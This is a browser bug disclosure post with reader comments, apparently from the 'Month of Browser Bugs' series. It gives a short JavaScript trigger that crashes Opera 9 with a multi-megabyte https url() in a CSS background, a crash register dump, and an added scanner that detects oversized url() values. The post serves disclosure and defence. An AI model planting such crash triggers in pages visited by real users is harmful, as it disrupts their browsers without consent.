MoBB #26: Opera CSS Background
The following bug was tested on the latest version of Opera 9 on a fully-patched Windows XP SP2 system. A memory corruption issue can be triggered by setting the background property of any DHTML element to a long HTTPS URL.
// Build a string of roughly 2 MB of 'X' characters by repeated doubling,
// then assign it as an https:// url() to the element's background property.
var a = document.createElement('a');
var b = 'XXXX';
while (b.length <= 1024*1024) b+=b;
a.style.background = 'url(https://' + b + ')';
Demonstration
eax=0c4f0020 ebx=00000000 ecx=0c4f0020
edx=0a4b0030 esi=00953ff8 edi=00200008
eip=67befb98 esp=0012e38c ebp=0012e404
Opera_679e0000+0x20fb98:
67befb98 668b32 mov si,[edx] ds:0023:0a4b0030=0000
This bug will be added to the OSVDB:
Opera CSS Background Property HTTPS Memory Corruption
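The trigger above is a url() argument of several megabytes in a background declaration. As an added example (not code from the MoBB post), the following scanner flags url() values in a CSS declaration list whose argument exceeds a length threshold, reporting the property and scheme; the threshold and the sample inputs are constructed assumptions.

```javascript
// Added example: detect anomalously long url() arguments in CSS text,
// the shape of the Opera 9 background-property crash discussed above.
// The 2048-byte threshold and the sample declarations are assumptions.

// Matches url( ... ) with an optional single- or double-quoted argument;
// CSS permits whitespace inside the parentheses around the argument.
const URL_TOKEN = /url\(\s*(?:"([^"]*)"|'([^']*)'|([^)]*?))\s*\)/gi;

// Returns one record per oversized url() in cssText, a declaration list
// such as an inline style attribute value. Declarations are split on ';',
// so a quoted URL that itself contains ';' would be mis-split (caveat).
function findOversizedCssUrls(cssText, maxLen = 2048) {
  const hits = [];
  for (const decl of cssText.split(';')) {
    const colon = decl.indexOf(':');
    if (colon < 0) continue;
    const property = decl.slice(0, colon).trim().toLowerCase();
    const value = decl.slice(colon + 1);
    for (const m of value.matchAll(URL_TOKEN)) {
      const url = (m[1] || m[2] || m[3] || '').trim();
      if (url.length > maxLen) {
        hits.push({
          property,
          scheme: url.split(':')[0].toLowerCase(),
          length: url.length,
        });
      }
    }
  }
  return hits;
}

// Constructed sample: one benign background plus the post's trigger shape
// (a 2 MB run of 'X' built by the same doubling loop as the PoC).
function buildSample() {
  let b = 'XXXX';
  while (b.length <= 1024 * 1024) b += b;
  return 'color: red; background: url("img/ok.png"); ' +
         'background: url(https://' + b + ')';
}

function demo() {
  return findOversizedCssUrls(buildSample());
}

console.log(demo());
```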
13 Comments:
why https? It crashes with plain http too.
Good catch! I tested all of the protocol handlers trying to figure out which one was triggering - must have missed plain http somehow :-)
So is this just a crash bug erroneously published as a security flaw, or is it actually exploitable?
So far, it doesn't look exploitable beyond a crash. Rumor is that the Opera team feels the same way. A couple security companies classified this as "critical" for some reason - I wonder if they even bothered to test it.
Confirmed crash in Opera 9.00, but seems to be fixed already in the Opera 9.01 weeklies.
this vulnerability IS exploitable for code execution!
versions 8.x are not affected.
Care to share an example? I haven't been able to get a memory mapping to reach the page that is dereferenced.
It is not exploitable, according to, well, everyone in the know :)
It's already fixed in new Opera weekly build.
They may have fixed the http/https issue, but I was still able to trigger this bug using the latest version of CSSDIE.
I have weekly build 8552 and I have no problem with it.
Seems like it doesn't crash the browser in the FreeBSD version of Opera.
Opera 9.01 build 8509 is NOT vulnerable.
Greetings,
janbar.:))